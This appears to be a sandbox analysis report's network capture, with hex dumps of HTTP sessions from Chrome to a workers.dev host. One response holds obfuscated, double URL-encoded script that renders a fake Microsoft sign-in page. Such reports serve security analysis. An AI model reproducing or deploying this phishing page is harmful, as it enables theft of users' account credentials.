                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                  Access-Control-Allow-Origin: *
                                  x-azure-ref: 20240417T231311Z-18655757dbc2g2k9uvx6z0wf3g000000043g000000001ar1
                                  x-fd-int-roxy-purgeid: 4554691
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-04-17 23:13:12 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                  Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.449739104.21.235.1824433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:11 UTC627OUTGET /q/Screen-Shot-2022-01-30-at-10.27.21-PM.png HTTP/1.1
                                  Host: www.linkpicture.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://nsjw.newf.workers.dev/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:12 UTC642INHTTP/1.1 404 Not Found
                                  Date: Wed, 17 Apr 2024 23:13:12 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  vary: Accept-Encoding
                                  x-turbo-charged-by: LiteSpeed
                                  Cache-Control: max-age=31536000
                                  CF-Cache-Status: HIT
                                  Age: 947374
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzVR%2BDQANlMmi0bxjzPy6NPaOgBMhrmC%2BQGBeOKUVWkFyUgguBNYwzcgVdDezKxaWkyNas486e0m2gX8FOgR%2FRfbMht%2Bdi9ElQTl%2Fvptpo3YbSIik%2Bqa8p5ma1voQYmrKla%2FynsB"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 87601ab22b2badcf-ATL
                                  2024-04-17 23:13:12 UTC727INData Raw: 32 36 35 39 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d
                                  Data Ascii: 2659<!DOCTYPE html><html><head><meta http-equiv="Content-type" content="text/html; charset=utf-8"><meta http-equiv="Cache-control" content="no-cache"><meta http-equiv="Pragma" content="no-cache"><meta http-equiv="Expires" content="0"><meta nam
                                  2024-04-17 23:13:12 UTC1369INData Raw: 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20
                                  Data Ascii: : 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%;
                                  2024-04-17 23:13:12 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66
                                  Data Ascii: text-align: center; } .additional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: lef
                                  2024-04-17 23:13:12 UTC1369INData Raw: 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20
                                  Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left;
                                  2024-04-17 23:13:12 UTC1369INData Raw: 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48 41 61 4d 2b 79 51 75 6e 42 6d 4e 53 77 62 52 56 59 68 2b 6b 4f 63 67 4d 68 76 52 44 42 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52
                                  Data Ascii: 7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0R
                                  2024-04-17 23:13:12 UTC1369INData Raw: 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e 74 45 55 4b 58 47 43 39 35 6a 4b 2b 52 67 34 51 42 56 77 4e 6d 6c 65 50 5a 56 6a 54 78 75 6f 32 34 6b 57 4d 72 51 48 67 2f 6e 5a 7a 78 44 71 6d 71 46 52 46 43 37 39 39 2b 64 62 45 69 72 4d 6f 56 45 58 68 56 41 30 37 59 2b 47 57 4e 4d 4f 42 43 78 49 49 70 43 67 43 70 41 58 35 4b 67 48 42 36 49 51 49 4c 48 77 45 33 48 58 6b 32 58 51 56 73 7a 64 53 6b 47 45 43 6a 55 41 42 68 50 4c 4d 64 54 2f 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 56 30 52 49 71 2f 36 2b
                                  Data Ascii: AVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+
                                  2024-04-17 23:13:12 UTC1369INData Raw: 56 34 69 77 59 4a 47 47 63 74 52 44 43 31 46 73 47 61 51 33 52 74 47 46 66 4c 34 6f 73 33 34 67 36 54 2b 41 6b 41 54 38 34 62 73 30 66 58 32 77 65 53 38 38 58 37 58 36 68 58 52 44 44 52 7a 64 77 48 5a 2f 35 44 32 68 6a 6a 67 68 74 33 4d 62 35 79 31 4e 49 4e 71 2b 62 65 5a 42 75 38 64 38 34 36 35 37 77 50 59 66 4e 38 70 5a 42 63 30 67 2b 4a 4b 69 4b 59 69 4e 72 39 72 34 76 31 5a 72 76 64 62 74 61 7a 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 54 74 39 47 51 41 36 68 2b 64 2f 31 64 45 35 41 6e 39 47 52 48 35 6f 35 6d 77 49 67 4b 48 76 68 43 42 69 35 6a 36 30
                                  Data Ascii: V4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60
                                  2024-04-17 23:13:12 UTC884INData Raw: 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 72 65 61 73 6f 6e 2d 74 65 78 74 22 3e 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 70 61 67 65 3a 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 69 6d 61 67 65
                                  Data Ascii: </section><p class="reason-text">The server cannot find the requested page:</p></div><section class="additional-info"><div class="container"><div class="additional-info-items"><ul><li><img src="/img-sys/server_misconfigured.png" class="info-image
                                  2024-04-17 23:13:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.449743104.21.50.1034433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:12 UTC598OUTGET /favicon.ico HTTP/1.1
                                  Host: nsjw.newf.workers.dev
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://nsjw.newf.workers.dev/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:12 UTC548INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:12 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Content-Length: 13452
                                  Connection: close
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5fbrnekGHihqrSfZCjLcLo2g3He6rwU3ILnQTBrZ2rOLgPgAHoaxx2xAcfqouExM%2F92YiTj7JcaBHe08rHcsotrtvvLYHdIh1OhNmI5%2BE2NhB9T7KhDyPVC7HfKeaIZEqrGQPtlG5Y%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 87601ab53feeb056-ATL
                                  alt-svc: h3=":443"; ma=86400
                                  2024-04-17 23:13:12 UTC821INData Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 25 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 30 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 68 65 61 64 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 6d 65 74 61 25 32 35 32 30 63 68 61 72 73 65 74 25 32 35 33 44 25 32 35 32 32 75 74 66 2d 38 25 32 35 32 32 25 32 35 33 45 25 32 35 30
                                  Data Ascii: <<script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253C%2521DOCTYPE%2520html%253E%250A%253Chtml%253E%250A%2520%2520%253Chead%253E%250A%2520%2520%2520%2520%253Cmeta%2520charset%253D%2522utf-8%2522%253E%250
                                  2024-04-17 23:13:12 UTC1369INData Raw: 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 6d 61 72 67 69 6e 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 25 32 35 33 41 25 32 35 32 30 63 6f 76 65 72 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 66 61 6d 69 6c 79 25 32 35 33 41 25 32 35 32 30 41 72 69 61 6c 25 32 35 32 43 25 32 35 32 30 48 65 6c 76 65 74 69 63 61 25 32 35 32 43 25 32 35 32 30 73 61 6e 73 2d 73 65 72 69 66 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 25 32 35 30 41 2e 66 6f 72 6d 61 6c 25 32 35 32 30 69 6e 70 75 74 25 32 35 37 42 25 32
                                  Data Ascii: B%250A%2520%2520padding%253A%25200%253B%250A%2520%2520margin%253A%25200%253B%250A%2520%2520background-size%253A%2520cover%253B%250A%2520%2520font-family%253A%2520Arial%252C%2520Helvetica%252C%2520sans-serif%253B%250A%257D%250A%250A.formal%2520input%257B%2
                                  2024-04-17 23:13:12 UTC1369INData Raw: 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 31 30 70 78 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 6f 72 64 65 72 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 77 69 64 74 68 25 32 35 33 41 25 32 35 32 30 34 38 25 32 35 32 35 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6c 6f 61 74 25 32 35 33 41 25 32 35 32 30 72 69 67 68 74 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 77 65 69 67 68 74 25 32 35 33 41 25 32 35 32 30 62 6f 6c 64 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 2e 62 75 74 74 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41
                                  Data Ascii: 520%2520padding%253A%252010px%253B%250A%2520%2520border%253A%2520none%253B%250A%2520%2520width%253A%252048%2525%253B%250A%2520%2520float%253A%2520right%253B%250A%2520%2520font-weight%253A%2520bold%253B%250A%257D%250A.button%257B%250A%2520%2520display%253A
                                  2024-04-17 23:13:12 UTC1369INData Raw: 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 6f 70 61 63 69 74 79 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 37 44 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 33 7a 69 70 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25
                                  Data Ascii: 0display%253A%2520none%253B%250A%2520%2520%2520%2520%2520%2520%2520%2520opacity%253A%25200%253B%250A%2520%2520%2520%2520%2520%2520%257D%250A%2520%2520%2520%2520%2520%2520%2523zip%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520display%253A%2520none%253B%
                                  2024-04-17 23:13:12 UTC1369INData Raw: 32 66 6f 72 6d 61 6c 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32
                                  Data Ascii: 2formal%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%2522%2520alt%253D%2522%2522%253E%250A%250A%2520%2520%2520%2
                                  2024-04-17 23:13:12 UTC1369INData Raw: 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 61 25 32 35 32 30 68 72 65 66 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 32 30 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 63 72 65 61 74 25 32 35 32 32 25 32 35 33 45 43 72 65 61 74 65 25 32 35 32 30 6f 6e 65 25 32 35 32 31 25 32 35 33 43 2f 61 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 2f 64 69 76 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43
                                  Data Ascii: %2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%253Ca%2520href%253D%2522%2522%2520class%253D%2522creat%2522%253ECreate%2520one%2521%253C/a%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253C/div%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253C
                                  2024-04-17 23:13:12 UTC1369INData Raw: 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 73 69 67 6e 69 6e 2d 6f 70 74 69 6f 6e 73 5f 34 65 34 38 30 34 36 63 65 37 34 66 34 62 38 39 64 34 35 30 33 37 63 39 30 35 37 36 62 66 61 63 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 70 25 32 35 33 45 53 69 67 6e 2d 69 6e 25 32 35 32 30 6f 70 74 69 6f 6e 25 32 35 33 43 2f 70 25
                                  Data Ascii: 20%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg%2522%2520alt%253D%2522%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cp%253ESign-in%2520option%253C/p%
                                  2024-04-17 23:13:12 UTC1369INData Raw: 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 6e 6f 61 63 63 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 6e 6f 61 63 63 63 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 63 72 65 61 74 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 63 72 65 61 74 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25
                                  Data Ascii: 29%250A%2520%2520%2520%2520%2520%2520const%2520noacc%2520%253D%2520document.querySelector%2528%2527.noaccc%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520creat%2520%253D%2520document.querySelector%2528%2527.creat%2527%2529%250A%2520%2520%2520%2520%
